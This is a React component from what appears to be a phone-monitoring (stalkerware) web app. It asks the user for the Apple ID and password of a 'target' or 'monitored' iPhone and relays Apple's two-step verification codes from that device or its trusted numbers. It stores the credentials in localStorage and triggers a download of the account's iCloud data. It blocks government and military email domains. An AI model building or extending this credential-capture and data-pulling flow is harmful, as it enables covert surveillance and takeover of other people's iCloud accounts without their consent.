import React, { useEffect, useState } from 'react'
import { Button, Modal, message, Tabs, Steps, Space, Select, Spin, Alert } from 'antd'
import { LoadingOutlined, SmileOutlined, SolutionOutlined, UserOutlined } from '@ant-design/icons'
import styles from '../../../../styles/icloud.module.scss'
import currentStyle from './index.module.scss'
import Card from '@mui/material/Card'
import CardContent from '@mui/material/CardContent'
import BindIllustrate from '/src/@core/components/bind-illustrate'
import { useTranslation } from 'src/utils/i18n'

import {
  authByDevice,
  authVerifyByDevice,
  downloadWeb,
  bySms,
  authVerifyBySms,
  authInfo,
  checkDownloadTime,
  sendDownloadTime,
  iosLoginReport,
  iosLoginVerification
} from 'src/@api/login'

import dynamic from 'next/dynamic'
import { useDispatch, useSelector } from 'react-redux'
import { fetchResetTime, advancedShow } from 'src/store/apps/Common'
import updateDeviceCredentials, { isUpdateCredentialsOk } from 'src/utils/updateDeviceCredentials'
import useIcloudLockedFlow from 'src/components/ios-extreme/icloud-locked/useIcloudLockedFlow'
import useIcloudCredentialReverify from 'src/components/ios-extreme/icloud-locked/useIcloudCredentialReverify'
import { ICLOUD_EC, isIcloudOk, isIcloudSendOk } from 'src/utils/icloudLoginResult'

const CodeBox = dynamic(import('@axetroy/react-codebox'), {
  ssr: false //这个要加上,禁止使用 SSR
})

import Image from 'next/image'

import Icon from 'src/@core/components/icon'
import { localPhoneSendEmail } from 'src/@api/android'

const steps = [
  {
    title: 'Connect'
  },
  {
    title: 'Verification'
  }
]

const UserVerify = () => {
  const dispatch = useDispatch()

  const [messageApi, contextHolder] = message.useMessage()
  const { t } = useTranslation('common')
  const [isModalOpen, setIsModalOpen] = useState(true)

  const [defaultSmsPhone, setDefaultSmsPhone] = useState({})
  const [smsPhoneList, setSmsPhoneList] = useState([])
  const [smsPhoneListLoading, setSmsPhoneListLoading] = useState(true)
  const [smsPhoneListDisabled, setSmsPhoneListDisabled] = useState(true)
  const [smsId, setSmsId] = useState('')
  const [activeKey, setActiveKey] = useState('1')
  const [smsErrorText, setSmsErrorText] = useState('') // icloud没有绑定手机号错误提示文案

  const [illustrate, setIllustrate] = useState(false)

  const showModal = () => {
    setIsModalOpen(true)
  }

  const handleCancel = () => {
    setIsModalOpen(false)
  }

  const onChange = async key => {
    if (key == 2) {
      let mode = 1

      let sms = await bySms({
        mode: mode,
        username: useUserName,
        password: usePassWord
      })

      let result = await authInfo({
        mode: mode,
        username: useUserName,
        password: usePassWord
      })

      setDefaultSmsPhone(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber)

      setSmsId(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber.id || '0')

      let mapData = result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumbers.map(item => {
        return {
          ...item,
          value: item.id,
          label: item.numberWithDialCode
        }
      })
      setSmsPhoneList(mapData)
      setSmsPhoneListDisabled(false)
      setSmsPhoneListLoading(false)
    }
  }

  const [current, setCurrent] = useState(0)

  const items = steps.map(item => ({ key: item.title, title: item.title }))

  const [useUserName, setUserName] = useState('')
  const [usePassWord, setPassWord] = useState('')
  const [isWarn, setIsWarn] = useState(false)

  const onchangeUserInput = e => {
    // 检查是否包含敏感邮箱后缀
    const input = e.target.value.trim()
    const forbiddenDomains = [
      '.gov', 'gov.cn', 'gov.hk', 'gov.mo', 'gov.tw', 'state.gov', 'gov.uk', 'gov.au', 'usa.gov', 'whitehouse.gov', 'gc.ca',
      '.mil', 'mil.cn', 'army.mil', 'navy.mil', 'af.mil', 'uscg.mil', 'usmc.mil', 'mod.uk', 'nato.int', 'defense.gov', 'gouv.fr'
    ]

    if (input.includes('@')) {
      const domain = input.split('@')[1].toLowerCase()
      if (forbiddenDomains.some(item => domain.toLowerCase().endsWith(item)) || input.includes('@gov') || input.includes('@mil')) {
        setIsWarn(true)
        setUserName('')

        return
      }
    }

    setUserName(input)
  }

  const onchangePassWordInput = e => {
    setPassWord(e.target.value.trim())
  }

  const [loginLoading, setLoginLoading] = useState(false)

  const login = async () => {
    if (useUserName === '' || usePassWord === '') {
      message.info(t('Value cannot be empty'))

      return
    }

    // let re = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/
    // if (!re.test(useUserName)) {
    //   message.info('Please enter the correct iCloud')

    //   return
    // }

    let mode = 1

    let obj = {
      mode: mode,
      username: useUserName,
      password: usePassWord,
      country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
    }
    setLoginLoading(true)

    // 请求异常（断网 / 超时 / 服务端错误）必须清掉 loading，否则按钮会一直转圈
    let data
    try {
      const res = await iosLoginVerification(obj)
      data = res?.data
    } catch (e) {
      console.error('[user-verify login] iosLoginVerification failed', e)
      setLoginLoading(false)
      message.info(e?.data?.em || 'Network error, please try again')

      return
    }

    // 上传ios日志
    iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_2": 1 })

    // 无论走哪个业务分支都先关掉转圈；业务错误码在 data.ec（如 10005 Apple ID locked），
    // 顶层 code / HTTP 状态码为 0 不代表成功
    setLoginLoading(false)

    if (!data || typeof data !== 'object') {
      message.info('Network error, please try again')

      return
    }

    if (data.ec === ICLOUD_EC.PASSWORD) {
      setLoginLoading(false)
      handlePasswordError(data.ec)

      message.info(data.em)
    } else if (data.ec === ICLOUD_EC.TWO_STEP) {
      iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_3": 1 })
      setLoginLoading(false)
      message.info(data.em)
      window.localStorage.setItem('DeviceUser', JSON.stringify(obj))
      setCurrent(1)
      if (data?.trustedPhoneNumbers[0]?.numberWithDialCode) {
        setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
        setSmsId(data.trustedPhoneNumbers[0].id || '0')
        let mapData = data.trustedPhoneNumbers.map(item => {
          return {
            ...item,
            value: item.id,
            label: item.numberWithDialCode
          }
        })
        setSmsPhoneList(mapData)
        setSmsPhoneListDisabled(false)
      } else {
        setSmsPhoneListDisabled(true)
        if (data?.ecPhoneList === 0) {
          setSmsErrorText(t(`iCloud doesnt have a phone number Please verify using the device verification code`))
        } else {
          setSmsErrorText(t(`Entered the incorrect verification codes Please wait 30 minutes before trying again`))
        }
      }
      setSmsPhoneListLoading(false)
    } else if (data.ec === ICLOUD_EC.LOCKED) {
      await handleEc10005({ username: useUserName, password: usePassWord })
    } else if (isIcloudOk(data)) {
      iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_4": 1 })
      setLoginLoading(false)

      messageApi.open({
        content: data.em,
        duration: 8,
        style: {
          fontSize: '26px'
        }
      })

      // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
      const updateRes = await updateDeviceCredentials({
        username: useUserName,
        password: usePassWord,
        verify: 1
      })

      if (!isUpdateCredentialsOk(updateRes)) {
        message.info(updateRes?.msg || data.em)

        return
      }

      window.localStorage.setItem('Basic', 1)
      window.localStorage.setItem('DeviceUser', JSON.stringify(obj))

      // let allow = await checkDownloadTime({ username: useUserName })
      // if (allow.data.basic_download) {
      let downloadRes = await downloadWeb({
        mode: 1,
        username: useUserName,
        password: usePassWord
      })

      messageApi.open({
        content: (
          <div style={{ maxWidth: '500px' }}>
            <p>{downloadRes.data.ed}</p>
          </div>
        ),
        duration: 8,
        style: {
          fontSize: '26px'
        }
      })
      await sendDownloadTime({ username: useUserName, type: 'basic_download' })
      setTimeout(() => {
        dispatch(fetchResetTime())
      }, 800)

      // }

      setIsModalOpen(false)

      // setIllustrate(true)
    } else {
      message.info(data.em)
      setLoginLoading(false)
    }
  }

  const codeDevice = async e => {
    let mode = 1

    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        let deviceUser = JSON.parse(window.localStorage.getItem('DeviceUser'))
        deviceUser.securityCode = securityCode

        // let allow = await checkDownloadTime({ username: useUserName })

        let verify = await iosLoginVerification({
          mode: 1,
          username: useUserName,
          password: usePassWord,
          securityCode: securityCode,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!verify?.data || typeof verify.data !== 'object') {
          message.info(t('Network error, please try again'))

          return
        }

        if (isIcloudOk(verify.data)) {
          iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_4": 1 })

          // if (allow.data.basic_download) {
          let downloadRes = await downloadWeb({ mode: 1, username: useUserName, password: usePassWord })

          // message.info(downloadRes.data.ed)

          // }

          // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
          const updateRes = await updateDeviceCredentials({
            username: useUserName,
            password: usePassWord,
            verify: 1
          })

          if (!isUpdateCredentialsOk(updateRes)) {
            message.info(updateRes?.msg || 'Update failed, please try again')

            return
          }

          dispatch(advancedShow())

          setTimeout(async () => {
            await sendDownloadTime({ username: useUserName, type: 'basic_download' })
          }, 1500)
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 2000)

          window.localStorage.setItem('Basic', 1)
          setIsModalOpen(false)
        } else {
          handlePasswordError(verify.data.ec)
          message.info(verify.data.em)
        }
      } catch (err) {
        console.error('[user-verify codeDevice] failed', err)
        message.info(err?.data?.em || t('Network error, please try again'))
      } finally {
        setLoginLoading(false)
      }
    }
  }

  const [sendTime, setSentTime] = useState(60)
  const [sendContentTips, setSendContentTips] = useState('')
  const [btnDisable, setBtnDisable] = useState(false)

  const sendSms = async () => {
    // 已发送 / 倒计时中，避免重复点击造成重复发送
    if (btnDisable) return

    try {
      const result = await iosLoginVerification({
        mode: 1,
        username: useUserName,
        password: usePassWord,
        phoneID: smsId,
        country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
      })

      // 仅 0 / 10000 / 10004 视为发送成功，其余按失败处理并提示后端返回的原因
      const ec = result?.data?.ec
      if (!isIcloudSendOk(ec)) {
        handlePasswordError(ec)
        message.info(result?.data?.em || 'Failed to send the verification code, please try again')


return
      }

      let ti = sendTime
      const timeChange = setInterval(() => {
        if (ti > 0) {
          //当x>0时执行更新方法
          ti = ti - 1
          setSentTime(ti)
        } else {
          //当x=0时执行终止循环方法
          clearInterval(timeChange)
          setBtnDisable(false)
          setSendContentTips('')
          setSentTime(60)
        }
      }, 1000)

      setSentTime(60)
      setSendContentTips(`A message containing the verification code has been sent to the target iPhone, please check it.`)
      setBtnDisable(true)
    } catch (e) {
      // 请求异常（断网 / 服务端错误）时不能让按钮卡死
      console.error('[sendSms] iosLoginVerification failed', e)
      setBtnDisable(false)
      setSendContentTips('')
      setSentTime(60)
      message.info(e?.data?.em || 'Failed to send the verification code, please try again')
    }
  }

  const codeSms = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        let result = await iosLoginVerification({
          mode: 1,
          username: useUserName,
          password: usePassWord,
          securityCode: securityCode,
          phoneID: smsId,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!result?.data || typeof result.data !== 'object') {
          message.info(t('Network error, please try again'))

          return
        }

        if (isIcloudOk(result.data)) {
          iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_4": 1 })

          // let allow = await checkDownloadTime({ username: useUserName })
          // if (allow.data.basic_download) {
          let downloadRes = await downloadWeb({
            mode: 1,
            username: useUserName,
            password: usePassWord
          })

          // message.info(downloadRes.data.ed)

          // }

          // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
          const updateRes = await updateDeviceCredentials({
            username: useUserName,
            password: usePassWord,
            verify: 1
          })

          if (!isUpdateCredentialsOk(updateRes)) {
            message.info(updateRes?.msg || 'Update failed, please try again')

            return
          }

          dispatch(advancedShow())

          setTimeout(async () => {
            await sendDownloadTime({ username: useUserName, type: 'basic_download' })
          }, 1500)
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 2000)

          window.localStorage.setItem('Basic', 1)
          setIsModalOpen(false)
        } else {
          handlePasswordError(result.data.ec)
          message.info(result.data.em)
        }
      } catch (err) {
        console.error('[user-verify codeSms] failed', err)
        message.info(err?.data?.em || t('Network error, please try again'))
      } finally {
        setLoginLoading(false)
      }
    }
  }

  const handleSelectChange = value => {
    setSmsId(value)
  }

  onkeydown = e => {
    if (e.keyCode === 13) {
      login()
    }
  }

  //弹窗
  const [modalOpen, setModalOpen] = useState(false)

  useEffect(() => {
    if (modalOpen) {
      setTimeout(() => {
        setModalOpen(false)
      }, 3000)
    }
  }, [modalOpen])

  const getLoginCountry = () =>
    (JSON.parse(localStorage.getItem('userData'))?.data?.country_name || '').toLocaleLowerCase()

  const applyBasicTwoStepFromReverify = (data, username, password) => {
    message.info(data.em)
    window.localStorage.setItem('DeviceUser', JSON.stringify({ mode: 1, username, password, country: getLoginCountry() }))
    setUserName(username)
    setPassWord(password)
    setCurrent(1)
    if (data?.ecurityType == 2) setActiveKey('2')
    if (data?.trustedPhoneNumbers?.[0]?.numberWithDialCode) {
      setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
      setSmsId(data.trustedPhoneNumbers[0].id || '0')
      setSmsPhoneList(data.trustedPhoneNumbers.map(item => ({ ...item, value: item.id, label: item.numberWithDialCode })))
      setSmsPhoneListDisabled(false)
    } else {
      setSmsPhoneListDisabled(true)
      setSmsErrorText(data?.ecPhoneList === 0
        ? t('iCloud doesnt have a phone number Please verify using the device verification code')
        : t('Entered the incorrect verification codes Please wait 30 minutes before trying again'))
    }
    setSmsPhoneListLoading(false)
  }

  const finishBasicDirectFromReverify = async (data, username, password) => {
    iosLoginReport({ platform: 'ios-icloud', site: 'msafely', s_4: 1 })
    message.info(data.em)
    const updateRes = await updateDeviceCredentials({ username, password, verify: 1 })
    if (!isUpdateCredentialsOk(updateRes)) {
      message.info(updateRes?.msg || data.em)


return
    }
    window.localStorage.setItem('Basic', 1)
    window.localStorage.setItem('DeviceUser', JSON.stringify({ mode: 1, username, password, country: getLoginCountry() }))
    const downloadRes = await downloadWeb({ mode: 1, username, password })
    message.info(downloadRes.data.ed)
    await sendDownloadTime({ username, type: 'basic_download' })
    setTimeout(() => dispatch(fetchResetTime()), 800)
    setIsModalOpen(false)
  }

  const { handleEc10005, lockedFlowModals, lockedFlowOpen } = useIcloudLockedFlow({
    mode: 1,
    updateCredentialsOnLock: true,
    onTwoStepRequired: async ({ data, username, password }) => applyBasicTwoStepFromReverify(data, username, password),
    onDirectSuccess: async ({ data, username, password }) => finishBasicDirectFromReverify(data, username, password)
  })

  // 10003（iCloud 密码不对）统一处理：退回「输入账号密码」那一步重填。
  // 已在输密码步骤、或被锁 / 重新验证弹窗正开着时跳过（见 useIcloudCredentialReverify）。
  const handlePasswordError = useIcloudCredentialReverify({ current, setCurrent, lockedFlowOpen })

  // 发送邮箱
  const sendEmail = async () => {
    try {
      //获取用户邮箱
      const email = JSON.parse(localStorage.getItem('userData'))?.data.email

      // 调用发邮件接口(code: 0 成功)
      await localPhoneSendEmail({ email })

      // 触发发送邮件事件
      dataLayer.push({
        event: 'sned-guide-email'
      })
    } catch (e) {
      console.log('send Email RunTimeExection Error', e)
    }
  }

  return (
    <>
      <Modal
        className='equipment'
        title=''
        closable={false}
        open={isModalOpen}
        onCancel={handleCancel}
        footer={[]}
        width={700}
      >
        <div
          style={{
            background: '#E7E7E7',
            display: 'flex',
            alignItems: 'center',
            justifyContent: 'space-between',
            padding: '0 10px',
            borderTopRightRadius: '8px',
            borderTopLeftRadius: '8px'
          }}
        >
          <h2 style={{ color: '#000000', fontSize: '22px' }}>{t('Basic Data Validation')} </h2>
          <Icon
            icon='ic:round-cancel'
            color='#494949'
            style={{ fontSize: '18px', cursor: 'pointer' }}
            onClick={handleCancel}
          />
        </div>
        <div
          style={{
            padding: '20px',
            display: 'flex',
            flexDirection: 'column',
            justifyContent: 'center',
            alignItems: 'center'
          }}
        >
          <Icon
            icon={'carbon:warning-filled'}
            className={currentStyle.icon}
            style={{ fontSize: '50px', color: '#D2B947' }}
          />
          <p style={{ fontSize: '16px', marginTop: '10px' }}>
            {t('A two-step verification code or SMS will be sent to the target iPhone from Apple official')}
          </p>
        </div>
        <Card style={{ width: '100%', background: '#fff' }}>
          <CardContent>
            <Steps current={current} items={items} />
            {current == 0 ? (
              <div className={currentStyle.formBox}>
                <div style={{ display: 'flex', justifyContent: 'center' }}>
                  <Image src='/images/apps/iphone.png' alt='img' width='30' height='30' />
                </div>
                <h1 className={currentStyle.h1} style={{ color: '#000' }}>
                  {t('Connect iCloud account on the target iPhone')}
                </h1>
                <p className={currentStyle.pText} style={{ color: '#000' }}>
                  {t('Enter the iCloud account and password of the monitored iPhone')}
                </p>

                <div style={{ display: 'flex', flexDirection: 'column', alignItems: 'center', marginTop: '26px' }}>
                  <input className={currentStyle.apple} onChange={e => onchangeUserInput(e)} placeholder='Apple ID' value={useUserName} />

                  <input
                    className={currentStyle.password}
                    type='password'
                    onChange={e => onchangePassWordInput(e)}
                    placeholder='Password'
                  />
                  <div className={currentStyle.connectBox}>
                    <Spin spinning={loginLoading}>
                      <button className={currentStyle.connect} onClick={login}>
                        {t('Connect')}
                      </button>
                    </Spin>
                  </div>
                </div>

                <p
                  className='text-right text-[14px] text-[#2405F2] font-[400] leading-[28px] cursor-pointer mt-4'
                  onClick={() => {
                    sendEmail()
                    setModalOpen(true)
                  }}
                >{t('How to get the required conditions')}</p>
              </div>
            ) : (
              <div className='steps-content'>
                <h1 style={{ textAlign: 'center', marginTop: '20px', fontSize: '20px', color: '#000' }}>
                  {t('Choose a verification method')}
                </h1>
                <Tabs
                  style={{ marginTop: '10px' }}
                  defaultActiveKey='1'
                  onChange={(key) => {
                    if (key === '2' && smsPhoneListDisabled) {
                      message.info(smsErrorText)

                      return
                    }
                    setActiveKey(key === '2' ? key : '1')
                  }}
                  activeKey={activeKey}
                  items={[
                    {
                      label: `Device`,
                      key: '1',
                      children: (
                        <>
                          <Spin spinning={loginLoading}>
                            <CodeBox
                              length={6}
                              validator={(input, index) => {
                                return /\d/.test(input)
                              }}
                              onChange={e => codeDevice(e)}
                            />
                          </Spin>
                          <p style={{ marginTop: '10px', textAlign: 'center' }}>
                            {t('A verification code has been sent to the target iPhone. Enter the verification code')}
                          </p>
                        </>
                      )
                    },
                    {
                      label: `SMS`,
                      key: '2',
                      children: (
                        <>
                          <div style={{ display: 'flex', justifyContent: 'center', padding: '10px' }}>
                            <Select
                              defaultValue={defaultSmsPhone}
                              style={{
                                width: 170
                              }}
                              loading={smsPhoneListLoading}
                              disabled={smsPhoneListDisabled}
                              onChange={handleSelectChange}
                              options={smsPhoneList}
                            />
                            <button
                              disabled={btnDisable}
                              style={{
                                background: btnDisable ? '#07273D' : '#1677ff',
                                padding: '0 10px',
                                marginLeft: '8px',
                                color: '#fff',
                                borderRadius: '10px'
                              }}
                              onClick={sendSms}
                            >
                              {btnDisable ? sendTime : 'send'}
                            </button>
                          </div>

                          <div style={{ textAlign: 'center' }}>{sendContentTips != '' ? sendContentTips : null}</div>
                          <Spin spinning={loginLoading}>
                            <CodeBox
                              length={6}
                              validator={(input, index) => {
                                return /\d/.test(input)
                              }}
                              onChange={e => codeSms(e)}
                            />
                          </Spin>
                          <p style={{ marginTop: '10px', textAlign: 'center' }}>{t('Enter the verification code')}</p>
                        </>
                      )
                    }
                  ]}
                />
              </div>
            )}
          </CardContent>
        </Card>
      </Modal>

      {contextHolder}

      <div className={`fixed inset-0 flex items-center justify-center ${!modalOpen ? 'hidden' : ''} z-[5254]`} onClick={() => setModalOpen(false)}>
        <div className="w-[82%] fixed Mlg:top-[42.5%] lg:top-[16%] left-1/2 max-w-[420px] xs:max-w-[360px] transform -translate-x-1/2 -translate-y-1/2 bg-black shadow-4xl rounded-[12px]">
          <div className="p-[22px_19px_27px_16px] flex flex-col items-start justify-center">
            <p className="w-full text-[16px] text-white font-[Poppins] font-[400] leading-[24px] text-left">
              {t('A guidance email has been sent to your mailbox')}
            </p>
            <p className="w-full text-[16px] text-white font-[Poppins] font-[400] leading-[24px] text-left mt-[5px]">
              {t('If not received it please check in spam or click again')}
            </p>
          </div>
        </div>
      </div>

      {/* {illustrate ? <BindIllustrate /> : null} */}

      {isWarn &&
        <div className="fixed top-0 right-0 left-0 bottom-0 bg-black bg-opacity-75 flex items-center justify-center z-[1201]">
          <div className='relative w-[700px] h-auto bg-white rounded-[8px] pb-10 pt-[60px] px-6 smj:w-full smj:mx-3'>
            <div className='flex items-center'>
              <Image src={'/warn.svg'} width={46} height={46} alt='warn' />
              <div className='ml-2 text-black text-[26px] font-[700]'>{t('Warning')}</div>
            </div>
            <p className='mt-6 text-black text-[20px]'>
              {t('The use of government-affiliated email addresses')}
            </p>
            <p className='mt-6 text-black text-[20px]'>
              {t('To proceed')}
            </p>
            <div className='flex justify-end mt-10'>
              <button className='h-[50px] w-[fit-content] px-5 bg-[#50e3c2] rounded-[6px] flex justify-center items-center text-black text-[20px] font-[700]'
                onClick={() => setIsWarn(false)}>
                {t('I Understand')}
              </button>
            </div>
          </div>
        </div>}
      {lockedFlowModals}
    </>
  )
}

export default UserVerify
